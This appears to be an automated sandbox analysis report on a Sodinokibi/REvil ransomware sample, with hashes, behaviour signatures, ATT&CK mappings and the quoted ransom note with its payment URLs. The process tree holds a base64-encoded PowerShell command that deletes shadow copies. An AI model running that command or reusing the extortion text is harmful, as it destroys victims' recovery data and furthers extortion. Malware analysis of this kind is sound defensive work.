Analysis

  • max time kernel
    167s
  • max time network
    190s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 01:30

General

  • Target

    9919bbfeffe4e371295b496c2da64f48e735e6dcb5737265c15bffeed3aa7f2f.exe

  • Size

    156KB

  • MD5

    12d3e7c73b9559dcca8a0dc246e9da77

  • SHA1

    b6580f2b35c51565151319df67db9806399f54d4

  • SHA256

    9919bbfeffe4e371295b496c2da64f48e735e6dcb5737265c15bffeed3aa7f2f

  • SHA512

    4c035683ba5755d01aa54a63f9d9d181d78dfef1ada23aad7ff975dc9ce9383cb81005c28b8eb82b52963010cf297b4ce188262b510c52a1282433a8a1b9fde0

Malware Config

Extracted

Path

C:\057tbn-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 057tbn. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/84C5CCA37DC9796D 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/84C5CCA37DC9796D Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: wIs/9T1FtTpcZ3Rdhi62HJEYPTikdEPLJus4FuATsd3+SkII0x4bvLwt3P2rJvmA NjlkrUiUiHx0Ew7tIy8Bvron+Chb0c37o/YXxP0Q6usm4YPgU/3o75pRTDsDw5b3 EpULqlfa2jPKX9MoYgyNs1/svQPNkOPzoWmBS6iaEXqzd48lAxLjQJOh8kMJvRFo /XUPmnpzvNldN3b7JneQDstlqJFBWHdaQ3AvMiIuLm9MQukBeQOu3ptLpjU2xpYS JQCJTwRJNDXenx4UvLe5Re0hKB7QyR3lAshoOrIV3YZbB76k49C8VQqk8grt3Un9 US+2vfL9owrh9B31mHpdbxyLaM2Y46jCe8FChjd9JmDZ8ev0YLaGklPULuK52Bcp q/8b7ReI9C+VskzIRb3nN608zwuwBHuX4GoJH01Q0zDRYQ55kHws/5Ia2EH8/uBI o5Ue18gtJtb3oh0K9Zh4AgjZfMFpC6iXXzUbP3s9rx4derKMZGwdJFqz7174qqGN dWXqHDpegsGDDVuNFtq/3bJe3ArE5CQqdZlmMUrRWQbKEA91tY52/bYafR1q6JA7 qXtZaYgxhJ1Ex9T9ILFP9+kHvzke8cOMKlzcx8YiZhZ+EbATwEb/IG2jE3u2nbVd 2cyxpHYxhyh3iPPH1JzXMKWQD1uSZ9pN0Hson/17BO8VbaINXrkPLK2ZAzm+P51d CCHC0cMgAnDPwz7AEeN5mLyFaXXxEpdYeMM4Yecbh6dXTOKyepba8prjOhCRNk3x WeOg/s7iVBJa2yYVo2g1gVPcB3AgVybztE9XuN2Oy1+MZF/NctlHQjkiGHau/qNd /Xcr1vmb6LOJO6clAIKT+beHmytOLU5a0ng19+U+ASOeli/bCBwgP92N36ItpmKx AS1NS4j5MIAgk6rRFIWlzvjmGnSoqcPIQlaR7WbBnucTPyJyezwod6ANDiK+1gDF meRg/cF2pQWMgF2eystj1Ve/Ph762+4LBFoxEJrVhkd9YnvHRfAS8mEaui9M9eQ5 McPbBgwA8c83OK6JARZA2PtZVfBhNgNhud3pe9VpU+Uvkn0EPFDQL6MbLD/e0bYu NasC+xVSLdminHC6Xl0kW4VyEzbwXDs++0TDCXfAbbryh3+yIAR8oVnE5lOCXnVg aOFruM1OfvtYwzz2TaNqAG9HYjxHK9PNpg7E/fDBbOGEeB5sSmaFyiln5oEqH1rh hNxOwF+aPj3NlN5rowbXOLjuNHM3Q8ub25j/i6fVE0JBOKLBP8Q+O5usyly0bRLG lJ6pYjoBAntM2QErr/Cn2w== Extension name: 057tbn ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/84C5CCA37DC9796D

http://decryptor.cc/84C5CCA37DC9796D

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 28 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9919bbfeffe4e371295b496c2da64f48e735e6dcb5737265c15bffeed3aa7f2f.exe
    "C:\Users\Admin\AppData\Local\Temp\9919bbfeffe4e371295b496c2da64f48e735e6dcb5737265c15bffeed3aa7f2f.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2852
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3052
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1468

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    2
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2852-122-0x000002126A510000-0x000002126A532000-memory.dmp
      Filesize

      136KB

    • memory/2852-125-0x000002126A6C0000-0x000002126A736000-memory.dmp
      Filesize

      472KB

    • memory/2852-137-0x0000021252380000-0x000002126A510000-memory.dmp
      Filesize

      385.6MB